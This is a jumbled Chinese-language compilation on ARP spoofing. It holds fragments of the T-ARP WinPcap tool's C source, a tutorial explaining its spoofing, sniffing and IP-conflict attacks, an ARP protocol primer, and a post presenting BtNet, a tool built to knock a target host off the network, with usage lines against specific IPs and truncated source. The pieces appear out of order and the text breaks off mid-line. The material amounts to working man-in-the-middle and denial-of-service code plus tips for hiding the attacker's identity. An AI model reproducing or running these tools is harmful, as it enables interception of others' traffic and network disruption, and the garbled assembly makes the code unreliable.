fsin.sin_addr.s_addr=htonl(firstip);
    ssin.sin_addr.s_addr=htonl(secondip);

    eth.eh_type=htons(ETH_ARP);
    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
       arp.arp_opt=htons(ARP_REPLY);      

    if(fun==3)
    {
        if(mm)
        {
            if((firstip==myip) && (secondip==myip))
            {
                        fm=TRUE;
                     sm=TRUE;

                memcpy(fmac,mmac,6);
                memcpy(smac,mmac,6);
            }
            else if(!fm || !sm)
            {
                printf("\nNot get enough data\n");
                return -1;
            }

            for(j=0;j<2;j++)
            {
                if(j==0)
                {
                    printf("\nSpoofing %.16s :  ",inet_ntoa(fsin.sin_addr));
                    printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));
                }
                else if(j==1)
                {
                    printf("Spoofing %.16s :  ",inet_ntoa(ssin.sin_addr));
                    printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));
                }
                                for(k=0;k<5;k++)
                        printf("%.2x-",mmac[k]);
                    printf("%.2x\n",mmac[5]);
            }
            printf("\ni will try to snoof ...\n\n");
                    stimes=TRUE;
        }
        else
        {
            printf("\nNot get enough data\n");
                return -1;
        }
    }
    else if(fun==4)
    {
        if(mm)
        {
            if((firstip==myip) && (secondip==myip))
            {
                        fm=TRUE;
                        sm=TRUE;

                         memcpy(fmac,mmac,6);
                      memcpy(smac,mmac,6);
            }
            else if(!fm || !sm)
            {
                              printf("\nNot get enough data\n");
                         return -1;
            }

            printf("\nReset %.16s :  ",inet_ntoa(fsin.sin_addr));
            printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));

                        for(k=0;k<5;k++)
                    printf("%.2x-",smac[k]);
                printf("%.2x\n",smac[5]);

            printf("Reset %.16s :  ",inet_ntoa(ssin.sin_addr));
            printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));

                        for(k=0;k<5;k++)
                    printf("%.2x-",fmac[k]);
                 printf("%.2x\n\n",fmac[5]);

                    stimes=FALSE;
        }
        else
        {
            printf("\nNot get enough data\n");
                return -1;
        }
    }
    else
        return -1;

    do
    {
        memcpy(eth.eh_dst,fmac,6);
        memcpy(arp.arp_tha,fmac,6);
        arp.arp_tpa=htonl(firstip);
        arp.arp_spa=htonl(secondip);

        if(!stimes)
        {
            memcpy(eth.eh_src,smac,6);
            memcpy(arp.arp_sha,smac,6);
        }
        else
        {
            memcpy(eth.eh_src,mmac,6);
            memcpy(arp.arp_sha,mmac,6);
        }

        memset(sendbuf,0,sizeof(sendbuf));
        memcpy(sendbuf,&eth;,sizeof(eth));
        memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

        PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

            if(PacketSetNumWrites(lpadapter,2)==FALSE)
        {
               printf("Warning: Unable to send a packet 2 times\n");
        }

        if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
        {
            printf("PacketSendPacket in SendSR Error: %d\n",GetLastError());
            return -1;
        }
        Sleep(1000); 

        memcpy(eth.eh_dst,smac,6);
        memcpy(arp.arp_tha,smac,6);
        arp.arp_tpa=htonl(secondip);
        arp.arp_spa=htonl(firstip);

        if(!stimes)
        {
            memcpy(eth.eh_src,fmac,6);
            memcpy(arp.arp_sha,fmac,6);
        }
                else   
        {
            memcpy(eth.eh_src,mmac,6);
            memcpy(arp.arp_sha,mmac,6);
        }

#include <packet32.h>
#include <ntddndis.h>
#include <stdio.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

#define ETH_IP       0x0800
#define ETH_ARP      0x0806
#define ARP_REQUEST  0x0001
#define ARP_REPLY    0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter  10

#pragma pack(push,1)

typedef struct ethdr
{
    unsigned char   eh_dst[6];
    unsigned char   eh_src[6];
    unsigned short  eh_type;
}ETHDR,*PETHDR;

typedef struct arphdr
{
    unsigned short  arp_hdr;
    unsigned short  arp_pro;
    unsigned char   arp_hln;
    unsigned char   arp_pln;
    unsigned short  arp_opt;
    unsigned char   arp_sha[6];
    unsigned long   arp_spa;
    unsigned char   arp_tha[6];
    unsigned long   arp_tpa;
}ARPHDR,*PARPHDR;

typedef struct iphdr
{
    unsigned char  h_lenver;
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;
    unsigned short checksum;
    unsigned int   sourceip;
    unsigned int   destip;
}IPHDR,*PIPHDR;

#pragma pack(push)

LPADAPTER lpadapter=0;
LPPACKET  lppacketr,lppackets;
ULONG     myip,firstip,secondip;
UCHAR     mmac[6]={0},fmac[6]={0},smac[6]={0};
BOOL      mm=FALSE,fm=FALSE,sm=FALSE;
FILE      *fp;
char      adapterlist[max_num_adapter][1024];
char      msg[50];
int       num=0;

void start()
{
    printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");
    printf("Homepage: www.safechina.net\n");
    printf("E-mail: TOo2y@safechina.net\n");
    return ;
}

void usage()
{
    printf("\nUsage: T-ARP  [-m|-a|-s|-r]  firstip  secondip  \n\n");
    printf("Option:\n");
    printf("   -m  mac        Get the mac address from firstip to secondip\n");
    printf("   -a  antisniff  Get the sniffing host from firstip to secondip\n");
    printf("   -s  spoof      1> Spoof the host between firstip and secondip\n");
    printf("       sniff      2> Sniff if firstip == secondip == your own ip\n");
    printf("       shock      3> Shock if firstip == secondip != your own ip\n");
    printf("   -r  reset      Reset the spoofed host work normally\n\n");
    printf("Attention:\n");
    printf("    1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
    printf("    2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n\n");
    return ;
}

int getmine()
{
    char   sendbuf[1024];
    int    k;
    ETHDR  eth;
    ARPHDR arp;

    for(k=0;k<6;k++)
    {
        eth.eh_dst[k]=0xff;
        eth.eh_src[k]=0x82;
        arp.arp_sha[k]=0x82;
        arp.arp_tha[k]=0x00;
    }
    eth.eh_type=htons(ETH_ARP);
    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
    arp.arp_opt=htons(ARP_REQUEST);
    arp.arp_tpa=htonl(myip);
    arp.arp_spa=inet_addr("112.112.112.112");

    memset(sendbuf,0,sizeof(sendbuf));
    memcpy(sendbuf,&eth;,sizeof(eth));
    memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

    PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
    if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
    {
        printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
        return -1;            
    }
    return 0;
}

void getdata(LPPACKET lp,int op)
{
    ULONG  ulbytesreceived,off,tlen,ulen,ulLines;
    ULONG  j,k;
    ETHDR  *eth;
    ARPHDR *arp;
    PIPHDR ip;
    char   *buf,*pChar,*pLine,*base;
    struct bpf_hdr      *hdr;
    struct sockaddr_in  sin;

一）winpcap驱动简介
    winpcap(windows packet capture)是windows平台下一个免费，公共的网络访问系统。开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。它提供了以下的各项功能：
    1> 捕获原始数据报，包括在共享网络上各主机发送/接收的以及相互之间交换的数据报；
    2> 在数据报发往应用程序之前，按照自定义的规则将某些特殊的数据报过滤掉；
    3> 在网络上发送原始的数据报；
    4> 收集网络通信过程中的统计信息。

    winpcap的主要功能在于独立于主机协议（如TCP-IP)而发送和接收原始数据报。也就是说，winpcap不能阻塞，过滤或控制其他应用程序数据报的发收，它仅仅只是监听共享网络上传送的数据报。因此，它不能用于QoS调度程序或个人防火墙。

    目前，winpcap开发的主要对象是windows NT/2000/XP，这主要是因为在使用winpcap的用户中只有一小部分是仅使用windows 95/98/Me，并且M$也已经放弃了对win9x的开发。因此本文相关的程序T-ARP也是面向NT/2000/XP用户的。其实winpcap中的面向9x系统的概念和NT系统的非常相似，只是在某些实现上有点差异，比如说9x只支持ANSI编码，而NT系统则提倡使用Unicode编码。

    本文讨论的是packet.dll所提供的各种函数，因为它们完全可以实现本文所希望的各项要求。但是如果你有其他特别的或更高级的要求，winpcap也提供了另一个动态连接库wpcap.dll。虽然wpcap.dll依靠于packet.dll,但是它却提供了一种更简单，直接，有力的方法来更好的利用编程环境。比如捕获一个数据报，创建一个数据报过滤装置或将监听到的数据报转存到某个文件等，wpcap.dll都会为你提供更加安全的实现方法。

二）Packet.dll相关数据结构及函数 
    本文的目的之一在于介绍如何利用winpcap驱动写ARP工具，因此有必要介绍一些相关的数据结构和函数，要不然看着一行行代码和函数，也许会有些不知所云。

    首先介绍一些相关的数据结构：
      1. typedef struct _ADAPTER  ADAPTER  //描述一个网络适配器；
      2. typedef struct _PACKET PACKET     //描述一组网络数据报的结构；
      3. typedef struct NetType NetType    //描述网络类型的数据结构；
      4. typedef struct npf_if_addr npf_if_addr  //描述一个网络适配器的ip地址；
      5. struct bpf_hdr   //数据报头部；
      6. struct bpf_stat  //当前捕获数据报的统计信息。

    下面，将介绍T-ARP用到的各个函数，他们都是在packet.dll中定义的：
    1>  LPPACKET PacketAllocatePacket(void)
        如果运行成功，返回一个_PACKET结构的指针，否则返回NULL。成功返回的结果将会传送到PacketReceivePacket()函数，接收来自驱动的网络数据报。

    2>  VOID PacketCloseAdapter(LPADAPTER lpAdapter)
        关闭参数中提供的网络适配器，释放相关的ADAPTER结构。

    3>  VOID PacketFreePacket(LPPACKET lpPacket)
        释放参数提供的_PACKET结构。

    4>  BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize)
        返回可以得到的网络适配器列表及描述。

    5>  BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterNames,npf_ip_addr *buff, PLONG NEntries)
        返回某个网络适配器的全面地址信息。
        其中npf_ip_addr结构包含：IPAddress,SubnetMask,Broadcast
        IPAddress: ip地址
        SubnetMask: 子网掩码
        Broadcast: 广播地址

    6>  BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)
        返回某个网络适配器的MAC类型。
        NetType结构里包含了LinkSpeed(速度）和LinkType(类型）。其中LinkType包含以下几种情况：
          NdisMedium802_3: Ethernet(802.3)
          NdisMediumWan: WAN
          NdisMedium802_5: Token Ring(802.5)
          NdisMediumFddi: FDDI
          NdisMediumAtm: ATM
          NdisMediumArcnet878_2: ARCNET(878.2)

    7>  BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s)
        返回几个关于当前捕获报告的统计信息。
        其中bpf_stat结构包含：bs_recv, bs_drop,ps_ifdrop,bs_capt
          bs_recv: 从网络适配器开始捕获数据报开始所接收到的所有数据报的数目，包括丢失的数据报；
          bs_drop: 丢失的数据报数目。在驱动缓冲区已经满时，就会发生数据报丢失的情况。

    8>  PCHAR PacketGetVersion()
        返回关于dll的版本信息。

    9>  VOID PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)
        初始化一个_PACKET结构。

    10> LPADAPTER PacketOpetAdapter(LPTSTR AdapterName)
        打开一个网络适配器。

    11> BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync)
        从NPF驱动程序读取网络数据报及统计信息。
        数据报编码结构： |bpf_hdr|data|Padding|bpf_hdr|data|Padding|

    12> BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync)
        发送一个或多个数据报的副本。

    13> BOOLEAN PacketSetBuff(LPADAPTER AdapterObject,int dim)
        设置捕获数据报的内核级缓冲区大小。

    14> BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter)
        为接收到的数据报设置硬件过滤规则。
        以下为一些典型的过滤规则：
          NDIS_PACKET_TYPE_PROMISCUOUS: 设置为混杂模式，接收所有流过的数据报；
          NDIS_PACKET_TYPE_DIRECTED: 只有目的地为本地主机网络适配器的数据报才会被接收；
          NDIS_PACKET_TYPE_BROADCAST: 只有广播数据报才会被接收；
          NDIS_PACKET_TYPE_MULTICAST: 只有与本地主机网络适配器相对应的多播数据报才会被接收；
          NDIS_PACKET_TYPE_ALL_MULTICAST: 所有多播数据报均被接收；
          NDIS_PACKET_TYPE_ALL_LOCAL: 所有本地数据报均被接收。

    15> BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject,int nwrites)
        设置调用PacketSendPacket()函数发送一个数据报副本所重复的次数。

    16> BOOLEAN PacketSetReadTimeout(LPADAPTER AdapterObject,int timeout)
        设置在接收到一个数据报后“休息”的时间。
   
    以上就是T-ARP所调用的各个函数，它包含了packet.dll里的大部分函数。如果你想更深层的了解winpcap,请访问相关网站，主页地址： http://winpcap.polito.it

三）T-ARP功能及原理介绍
    准备工作： 
      1. 安装winpcap驱动，目前最新的版本为winpcap_3.0_alpha, 稳定版本为winpcap_2.3；
      2. 使用ARP欺骗功能前，必须启动ip路由功能，修改(添加)注册表选项：
　　  　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1　

    选项: 
      -m  主机扫描，获得局域网内指定ip段中存活主机的ip地址和mac地址；
      -a  反嗅探扫描，获得局域网内指定ip段中嗅探主机的ip地址和mac地址；
      -s  ARP欺骗，欺骗局域网内指定的两台主机，使其相互发送接收的数据报均通过本地主机；
          网络嗅探，如果你选择欺骗的两台主机均是本地主机，那么将会监听到所有流过本地主机的数据报；
          IP冲突，如果你选择欺骗的两台主机是同一台非本地主机，那么就会发起ip冲突攻击；
      -r  重置被欺骗主机，使被欺骗的两台主机恢复正常的工作状态。

    原理及实现过程：
      无论什么选项，第一件事就是获得本地主机的mac地址及相关网络设置。我们以一个特殊的ip地址(112.112.112.112)向本地主机发送一个ARP Request(ARP请求)数据报，当本地主机接收到后，就会发送一个ARP Reply(ARP应答)数据报来回应请求，这样我们就可以获得本地主机的mac地址了。至于相关的网络设置可以通过PacketGetNetInfoEx()和PacketGetNetType()获得。

      -m  以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送广播(ff:ff:ff:ff:ff:ff)ARP Request数据报，存活的主机就会发送ARP Reply数据报，这样就可以获得当前存活主机的列表。因为在很多网关上都对ARP Request做了限制--非内网ip发送的ARP Request数据报不会得到网关的回应，如果你用内网的其他某台主机的ip来发送ARP Request数据报，如果填写的mac地址和相应的ip不合，就会出现ip冲突。所以最好还是用自己的ip和mac地址来发送请求。

      -a  以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送31位伪广播地址(ff:ff:ff:ff:ff:fe)的ARP Request数据报，只有正在嗅探的主机才会发送ARP Reply数据报，这样就可以获得当前存活主机的列表。嗅探中的win2000系统还会对16位伪广播地址(ff:ff:00:00:00:00)做出回应；而嗅探中的win95/98/me不仅会回应16位伪广播地址，而且也会回应8位伪广播地址(ff:00:00:00:00:00)，而*NIX系统对各种广播地址所做出的反应却有些不同。在此我们选择31位伪广播地址，是因为绝大多数的系统在嗅探时都会对它做出回应。而正常状况下的各种系统，都不会对31位伪广播地址做出回应。

      -s (ARP欺骗spoof) 需要强调的是在某些局域网(如以太网)内，数据报的发送与接收是基于硬件地址的，这是我们实现欺骗的基础。首先获得指定的两台主机(假设为 A 和 B)的mac地址，然后向A发送ARP Reply数据报，其中的源ip地址为B的ip地址，但是源mac地址却是本地主机的mac地址，这样主机A就会认为主机B的mac地址是本地主机的mac地址，所以主机A发送到主机B的数据报都发送到本地主机了。同理向主机B发送ARP Reply数据报，通知它主机A的mac地址为本地主机的mac地址。这样主机A和主机B就会把目的主机的mac地址理解为本地主机的mac地址，于是他们之间相互发送的数据报都首先到达了本地主机，而先前我们已经将本地主机设置了ip路由功能，系统会自动将数据报转发到真正的目的主机。其间，你就可以监听它们通信的各种数据报了。

      -s (网络嗅探sniff) 如果指定的两个目的主机均为本地主机，那么就只是将网络适配器设置为混杂模式，这样就可以监听到流过本地主机网络适配器的各种数据。

      -s (ip冲突shock） 如果你选择欺骗的两台主机是同一台非本地主机(假如是主机C)，那么就会不断地向主机C发送ARP Reply数据报，报文中的源ip地址就是主机C的ip地址，但是源mac地址却是本地主机的mac地址，因此主机C就会发现有另一台主机同时拥有和自己相同的ip，这就是ip冲突攻击。如果是非xp系统,都会跳出一个ip冲突的提示窗口，而xp系统也会有类似的警告。但是请注意，在主机C的系统事件查看器中，会留下本地主机的mac地址与之冲突的恶心记录，所以你最好不要滥用这个功能。

      -r  在实现了ARP欺骗的情况下，向主机A和B发送ARP Reply数据报，通知主机A(B)注意主机B(A)的mac地址为主机B(A)自己的mac地址，这样主机A和B就会更新他们的ARP缓存，实现正常的数据通信。
     
四）T-ARP主要代码分析
    1> 自定义函数：
      int getmine()    //发送ARP Request数据报，请求获得本地主机的mac地址；
      void getdata(LPPACKET lp,int op)  //分类处理接收到的数据报；
      DWORD WINAPI sniff(LPVOID no)     //将网络适配器设置为混杂模式，接收所有流过的数据报；
      DWORD WINAPI sendMASR(LPVOID no)  //发送ARP Request数据报，请求获得指定ip的mac地址；
      DWORD WINAPI sendSR(LPVOID no)    //发送ARP Reply进行ARP欺骗，或是更新主机的ARP缓存。

    2> 主要代码分析
      printf("\nLibarary Version: %s",PacketGetVersion());  //输出dll的版本信息；

      PacketGetAdapterNames((char *)adaptername,&adapterlength)  //获得本地主机的网络适配器列表和描述；

      lpadapter=PacketOpenAdapter(adapterlist[open-1]);  //打开指定的网络适配器；

      PacketGetNetType(lpadapter,&ntype)  //获得网络适配器的MAC类型；

      PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen)  //获得指定网络适配器的相关信息；

      rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);  //创建一个新线程来监听网络数据报；

      PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)  //将网络适配器设置为混杂模式，这样才可以监听流过本地主机的数据报；
      PacketSetBuff(lpadapter,500*1024)  //自定义网络适配器的内核缓的大小为 500*1024；

      PacketSetReadTimeout(lpadapter,1)  //设置接收一个数据报后等待的时间为1毫秒；

      PacketReceivePacket(lpadapter,lppacketr,TRUE)  //在设置为混杂模式后，接收所有的数据报；

      sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
      sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);  //创建一个新线程发送特定的ARP数据报

      PacketSetNumWrites(lpadapter,2)  //在发送一个数据报时，重复发送两次；

      PacketSendPacket(lpadapter,lppackets,TRUE)  //发送自定义数据报；
     
      WaitForSingleObject(sthread,INFINITE);  //等待发送ARP数据报的线程结束；

      PacketGetStats(lpadapter,&stat)  //获得网络适配器的统计信息；

ARP，全称Address Resolution Protocol，中文名为地址解析协议，它工作在数据链路层，在本层和硬件接口联系，同时对上层提供服务。

IP数据包常通过以太网发送，以太网设备并不识别32位IP地址，它们是以48位以太网地址传输以太网数据包。因此，必须把IP目的地址转换成以太网目的地址。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。ARP协议用于将网络中的IP地址解析为的硬件地址（MAC地址），以保证通信的顺利进行。

1. ARP和RARP报头结构

ARP和RARP使用相同的报头结构，如图1所示。

（图1　ARP/RARP报头结构）

硬件类型字段：指明了发送方想知道的硬件接口类型，以太网的值为1；

协议类型字段：指明了发送方提供的高层协议类型，IP为0800（16进制）；
硬件地址长度和协议长度：指明了硬件地址和高层协议地址的长度，这样ARP报文就可以在任意硬件和任意协议的网络中使用；

操作字段：用来表示这个报文的类型，ARP请求为1，ARP响应为2，RARP请求为3，RARP响应为4；

发送方的硬件地址（0-3字节）：源主机硬件地址的前3个字节；

发送方的硬件地址（4-5字节）：源主机硬件地址的后3个字节；

发送方IP（0-1字节）：源主机硬件地址的前2个字节；

发送方IP（2-3字节）：源主机硬件地址的后2个字节；

目的硬件地址（0-1字节）：目的主机硬件地址的前2个字节；

目的硬件地址（2-5字节）：目的主机硬件地址的后4个字节；

目的IP（0-3字节）：目的主机的IP地址。

用c描述:

typedef struct arphdr //arp头
{
unsigned short arp_hdr; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度
unsigned char arp_pln; //协议地址长度
unsigned short arp_opt; //
unsigned char arp_sha[6]; //发送端以太网地址
unsigned long arp_spa; //发送端ip地址
unsigned char arp_tha[6]; //接收端以太网地址
unsigned long arp_tpa; //接收端ip地址
}ARPHDR,*PARPHDR;

2. ARP和RARP的工作原理

ARP的工作原理如下：

1. 首先，每台主机都会在自己的ARP缓冲区 (ARP Cache)中建立一个 ARP列表，以表示IP地址和MAC地址的对应关系。

2. 当源主机需要将一个数据包要发送到目的主机时，会首先检查自己 ARP列表中是否存在该 IP地址对应的MAC地址，如果有﹐就直接将数据包发送到这个MAC地址；如果没有，就向本地网段发起一个ARP请求的广播包，查询此目的主机对应的MAC地址。此ARP请求数据包里包括源主机的IP地址、硬件地址、以及目的主机的IP地址。

3. 网络中所有的主机收到这个ARP请求后，会检查数据包中的目的IP是否和自己的IP地址一致。如果不相同就忽略此数据包；如果相同，该主机首先将发送端的MAC地址和IP地址添加到自己的ARP列表中，如果ARP表中已经存在该IP的信息，则将其覆盖，然后给源主机发送一个 ARP响应数据包，告诉对方自己是它需要查找的MAC地址；
4.   源主机收到这个ARP响应数据包后，将得到的目的主机的IP地址和MAC地址添加到自己的ARP列表中，并利用此信息开始数据的传输。如果源主机一直没有收到ARP响应数据包，表示ARP查询失败。

RARP的工作原理：

1. 发送主机发送一个本地的RARP广播，在此广播包中，声明自己的MAC地址并且请求任何收到此请求的RARP服务器分配一个IP地址；

2. 本地网段上的RARP服务器收到此请求后，检查其RARP列表，查找该MAC地址对应的IP地址；

3. 如果存在，RARP服务器就给源主机发送一个响应数据包并将此IP地址提供给对方主机使用；

4. 如果不存在，RARP服务器对此不做任何的响应；

5. 源主机收到从RARP服务器的响应信息，就利用得到的IP地址进行通讯；如果一直没有收到RARP服务器的响应信息，表示初始化失败。

二、解码详解

了解了ARP和RARP协议的报头结构和工作原理后，我们使用科来网络分析系统抓取ARP包，其详细解码，如图2，

（图2　科来网络分析系统中ARP请求包详细解码）

图2显示是一个ARP的请求包的解码，下面我们来详细说明：

硬件类型：1，表示硬件借口类型为以太网类型

协议类型：0x0800，表示发送方提供的高层协议类型是IP

硬件地址长度：表示硬件地址长度为6字节=48位

协议地址长度：表示IP地址长度为4字节=32位

操作类型：1，表示ARP请求

源物理地址：00:14:85:CA:F5:22

源IP地址：192.168.0.92

目标物理地址：00:00:00:00:00:00

目标IP地址：192.168.0.208

ARP回应包和RARP的包类似，我们在这里就不再重复说明。

内容摘要：一般的arp spoof是向被欺骗主机发送ARP REPLY数据报,把其中的源IP地址置为被欺骗主机要发包去的主机地址，源MAC地址却改为自己的MAC地址。我们把发送给A的arp数据报的源IP,源MAC更改成任意的，会出现什么现象？下面是我的几个测试

最近开始学WINPCAP，看了很多高手写的基于arp欺骗的抓包工具，尤其是电子科大的TOo2y师兄的《详谈调用winpcap驱动写arp多功能工具》，令我收益非浅。下面是我把这个思想改成arp攻击程序(可令目标主机断开网络连接)的一些测试。高手请略过，以免有班门弄斧之闲。

　　一般的arp spoof是向被欺骗主机发送ARP REPLY数据报,把其中的源IP地址置为被欺骗主机要发包去的主机地址，源MAC地址却改为自己的MAC地址。假设有两台机器A,B，发送一个ARP REPLY数据报给A,其中源IP地址为B的地址,源MAC地址为我的机器的MAC地址(IPRouter功能打开确保数据被转发)，那么A发送到B的数据报就发到我的机器上了，同样对B做相同到操作，那么A<==>B之间的数据就会源源不断的通过我的机器转发，直到一个正常的ARP包更改了A,B的arp缓存为止。

　　那么我们把发送给A的arp数据报的源IP,源MAC更改成任意的，会出现什么现象？下面是我的几个测试

　　1. 源IP更改为网关IP,源MAC改为不存在的MAC地址

　　对目标主机几乎不影响

　　2. 源IP更改为网关IP,源MAC改为内网内任意一台存在但没有开启IPRouter的主机的MAC地址

　　几乎不影响

　　3. 源IP更改为网关IP,源MAC改为目标主机的MAC

　　目标主机立刻断网!

　　可见当发送经过我们构造的ARP REALY包给目标主机时,会使目标主机的ARP缓存更改，数据封装到MAC层的时候会把网关的IP和自己的MAC地址封装到一起，那么发送到网关的数据报只好发给自己了，呵呵。

　　至于第1种情况，猜想大概是由于MAC地址不存在,目标主机会广播一个ARP REQUEST包而更新了自己的ARP缓存所致。

　　至于第2种情况，猜想源MAC地址所属主机会返回一个ARP REPLY给目标主机。

　　水平有限，所以只是猜想，知道的请告诉我一声，先谢过了。再说一下，以上测试只对于windows系统，当然也测试过对没有配置好的Red Hat成功过。

　　测试程序(BtNet.exe)说明：

　　Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]

　　-m参数是你要修改的源MAC地址.

　　为了隐蔽攻击者身份，程序再得到目标主机MAC地址时伪装成IP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5，可能会得不到目标主机的MAC地址，那么要得到MAC地址请借助第三方工具。

　　附测试程序代码

#include "packet32.h"
#include "ntddndis.h"
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //arp请求包
#define ARP_REPLY 0x0002 //arp应答包
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
#pragma pack(push,1)
typedef struct ethdr
{
unsigned char eh_dst[6]; //以太网目的地址
unsigned char eh_src[6]; //以太网源地址
unsigned short eh_type; //
}ETHDR,*PETHDR;
typedef struct arphdr //arp头
{
unsigned short arp_hdr; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度
unsigned char arp_pln; //协议地址长度
unsigned short arp_opt; //
unsigned char arp_sha[6]; //发送端以太网地址
unsigned long arp_spa; //发送端ip地址
unsigned char arp_tha[6]; //接收端以太网地址
unsigned long arp_tpa; //接收端ip地址
}ARPHDR,*PARPHDR;
typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;
#pragma pack(push)
LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]="128.128.128.128";
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;
int getint(char c)
{
int t=-1;
if((c<='9')&&(c>='0'))
t=c-'0';
else if((c>='a')&&(c<='f'))
t=10+c-'a';
else if((c>='A')&&(c<='F'))
t=10+c-'A';
return t;
}
void start()
{
printf("BtNet //--an ARP Tool test the Windows Break the Internetn");
printf("written by Ruder,10/2003n");
printf("Homepage: http://xEyes.cdut.net/ruder/index.htm;n");
printf("E-mail: cocoruder@163.comn");
printf("nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n");
printf("Example:n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn");
printf(" Warning: You must have installed the winpcap_2.3 or
winpcap_3.0_alphan");
return ;
}
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %dn",GetLastError());
return 0;
}
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous moden");
}
if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %dn",GetLastError());
return 0;
}
if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeoutn");
}
if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %dn",GetLastError());
return 0;
}
PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;
off=0;
while(off{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);
eth=(PETHDR)pChar; //以太头
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头
int i;
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
pr